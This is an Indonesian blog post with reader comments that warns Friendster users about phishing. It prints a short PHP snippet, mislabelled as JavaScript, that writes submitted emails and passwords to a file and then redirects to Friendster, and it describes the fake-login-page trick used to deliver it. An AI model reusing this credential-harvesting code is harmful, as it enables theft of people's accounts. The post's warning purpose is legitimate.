Friendster Hack = Jebakan

Bagi pengguna FS (friendster) harap hati-hati dengan ulah para hacker yang usil!!!!! Pesan ini tidak hanya ditujukan pada korban hacking, tapi juga buat orang-orang yang usil ngehack FS teman atau orang lain.

Sebenarnya, ngeHack FS itu gampang-gampang susah. Kenapa saya katakan gampang???? Yah, itu memmang itu mudah dilakukan hanya dengan modal search engine seperti google,yahoo,msn,dll….

Misalkan jika Anda sedang kesal sama orang lain dan pingin ngeHack FS orang tadi trus Anda cari cara buat ngehack FS trus ketemu deh sama artikel atau cara ngehack FS. Biasanya yang sering Anda temui dari search engine adalah java script sperti dibawah ini

$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(’password.txt’, ‘a’);
fwrite($fl, “$email . $password \n\n”);
fclose($fl);

?>

window.location=”http://www.friendster.com/index.php”;

(saya tidak dapat menjamin, java script itu dapat digunakan atau tidak)

Di beberapa artikel yang saya baca, java script tersebut dikirimkan dengan cara post comment, jika comment tersebut di approve oleh korban maka korban akan menuju page dimana dalam visualisasinya si korban diminta untuk log-in lagi. Nah! secara otomatis,  si korban akan memasukkan e-mail dan passwordnya. Padahal, jika diperhatikan dengan baik (URLnya) itu bukanlah alamat FS tapi itu adalah alamat web lain yang menyerupai halaman log-in FS. Trus password dan e-mailnya ada di tangan kita deh!!!! ITU BERLAKU JIKA ANDA BERHASIL

Bagaimana jika tidak berhasil??????

yah, maaf saja ya! mungkin FS Anda sendiri yang tidak selamat alias bakal dihapus sama BOSSnya FS

SO, buat yang suka FSan harap hati-hati! Jangan lupa FSnya di log-out! Atau buat yang suka di warnet, jangan sampai komputer-warnet menyimpan password Anda

And, buat yang suka usil. Mendingan langsung sewa Hacker aja kalo pingin ngehack FS. Soalnya, nggak akan ada ilmu yang gratis karena ilmu butuh pengorbanan.

6 Komentar

  1. cara hacker friendster gmna .?

  2. wah.. manjur banget.
    nah gwsekarang jadi hacker sejati.
    hee…………….
    tapi… semoga tuhan mengampuniku….

  3. hack aja FS ini kal0 bisa…
    Cdma_co@yahoo.com

  4. hmmm……

  5. gk jitu ah….gk mau ngasih kodenya

  6. eeeee alah….ora ndonyo ora internet isine jabakan


Comments RSS TrackBack Identifier URI

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

  • Kategori

  • another side

  • Tanggalan

    November 2008
    S S R K J S M
    « Okt   Des »
     12
    3456789
    10111213141516
    17181920212223
    24252627282930
  • Smada’s Social Clan

  • Diatas